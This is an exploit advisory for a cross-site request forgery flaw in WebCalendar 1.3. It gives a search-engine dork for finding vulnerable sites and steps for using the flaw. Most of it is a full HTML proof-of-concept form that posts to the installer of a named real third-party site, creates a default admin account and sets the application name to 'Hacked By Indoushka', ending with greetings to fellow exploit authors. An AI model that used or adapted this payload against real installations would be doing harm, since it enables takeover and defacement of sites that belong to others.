Headline
WebCalendar 1.3 Cross Site Request Forgery
WebCalendar version 1.3 suffers from a cross site request forgery vulnerability.
====================================================================================================================================| # Title : WebCalendar v1.3 CSRF Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://github.com/craigk5n/webcalendar/archive/master.zip | | # Dork : WebCalendar v1.3 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 173.[+] Set the target site link Save changes and apply . [+] infected file : install/index.php.[+] http://127.0.0.1/q7.3/admin/settings.php.[+] save code as poc.html .[+] <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>WebCalendar Setup Wizard</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <script><!-- <![CDATA[ var xlate = []; xlate['invalidColor'] = 'Invalid Color'; function testPHPInfo() { var url = "index.php?action=phpinfo"; window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' ); } function validate( form ) { // Only check to make sure single-user login is specified // if in single-user mode. var err = '', form = document.form_app_settings, listid = 0; // Find id of single user object. for( i = 0; i < form.form_user_inc.length; i++ ) { if( form.form_user_inc.options[i].value == 'none' ) listid = i; } if( form.form_user_inc.options[listid].selected ) { if( form.form_single_user_login.value.length == 0 ) { // No single user login specified. alert( 'Error: You must specify a\nSingle-User Login.' ); form.form_single_user_login.focus(); return false; } } if( form.form_server_url.value == '' ) { err += "Server URL is required.\n"; form.form_server_url.select(); form.form_server_url.focus(); } else if( form.form_server_url.value.charAt( form.form_server_url.value.length - 1 ) != '/' ) { err += "Server URL must end with a slash(/).\n"; form.form_server_url.select(); form.form_server_url.focus(); } if( err != '' ) { alert( "Error:\n\n" + err ); return false; } // Submit form... form.submit(); } function auth_handler() { var form = document.form_app_settings, listid = 0; // Find id of single user object. for( i = 0; i < form.form_user_inc.length; i++ ) { if( form.form_user_inc.options[i].value == 'none' ) listid = i; } if( form.form_user_inc.options[listid].selected ) { makeVisible( 'singleuser' ); } else { makeInvisible( 'singleuser' ); } } function db_type_handler() { var form = document.dbform, listid = 0, selectvalue = form.form_db_type.value; if( selectvalue == 'sqlite' || $db_type == 'sqlite3' || selectvalue == 'ibase' ) { form.form_db_database.size = 65; document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)'; } else { form.form_db_database.size = 20; document.getElementById( 'db_name' ).innerHTML = 'Database Name: '; } } function chkPassword() { var form = document.dbform, db_pass = form.form_db_password.value, illegalChars = /\#/; // Do not allow #.../\#/ would stop all non-alphanumeric. if( illegalChars.test( db_pass ) ) { alert( 'The password contains illegal characters.' ); form.form_db_password.select(); form.form_db_password.focus(); return false; } }//]]> --> </script> <script src="../includes/js/visible.js"></script> <style> body { margin:0; background:#fff; font-family:Arial, Helvetica, sans-serif; } table { border:0; } th.header, th.pageheader, th.redheader { background:#eee; } th.pageheader { padding:10px; font-size:18px; } th.header, th.redheader { font-size:14px; } th.redheader, .notrecommended { color:red; } td { padding:5px; } td.prompt, td.subprompt { padding-right:20px; font-weight:bold; } td.subprompt { font-size:12px; } div.nav { margin:0; border-bottom:1px solid #000; } div.main { margin:10px; } li { margin-top:10px; } doc.li { margin-top:5px; } .recommended { color:green; } </style> </head> <body onload="auth_handler();"> <table border="1" width="90%" class="aligncenter"> <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th> <tr> <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td> </tr> <th class="header" colspan="2">Application Settings</th> <tr> <td colspan="2"> <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul> </td> </tr> <tr> <td> <table width="75%" class="aligncenter"> <tr> <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings"> <input type="hidden" name="app_settings" value="1" /> <td class="prompt">Create Default Admin Account:</td> <td> <input type="checkbox" name="load_admin" value="Yes" /> <span class="notrecommended"> (Admin Account Not Found)</span> </td> </tr> <tr> <td class="prompt">Application Name:</td> <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td> </tr> <tr> <td class="prompt">Server URL:</td> <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td> </tr> <tr> <td class="prompt">User Authentication:</td> <td> <select name="form_user_inc" onChange="auth_handler()"> <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option> <option value="http">Web Server (not detected)</option> <option value="user-imap.php">IMAP</option> <option value="none" >None (Single-User)</option> </select> </td> </tr> <tr id="singleuser"> <td class="prompt"> Single-User Login:</td> <td><input name="form_single_user_login" size="20" value="" /></td> </tr> <tr> <td class="prompt">Read-Only:</td> <td> <input name="form_readonly" value="true" type="radio" />Yes <input name="form_readonly" value="false" type="radio" checked="checked" />No </td> </tr> <tr> <td class="prompt">Environment:</td> <td> <select name="form_mode"> <option value="prod" selected="selected">Production</option> <option value="dev">Development</option> </select> </td> </tr> </table> </td> </tr> </table> <table width="80%" class="aligncenter"> <tr> <td class="aligncenter"> <input name="action" type="button" value="Save Settings" onClick="return validate();" /> <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" /> </form> </td> </tr> </table> </body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================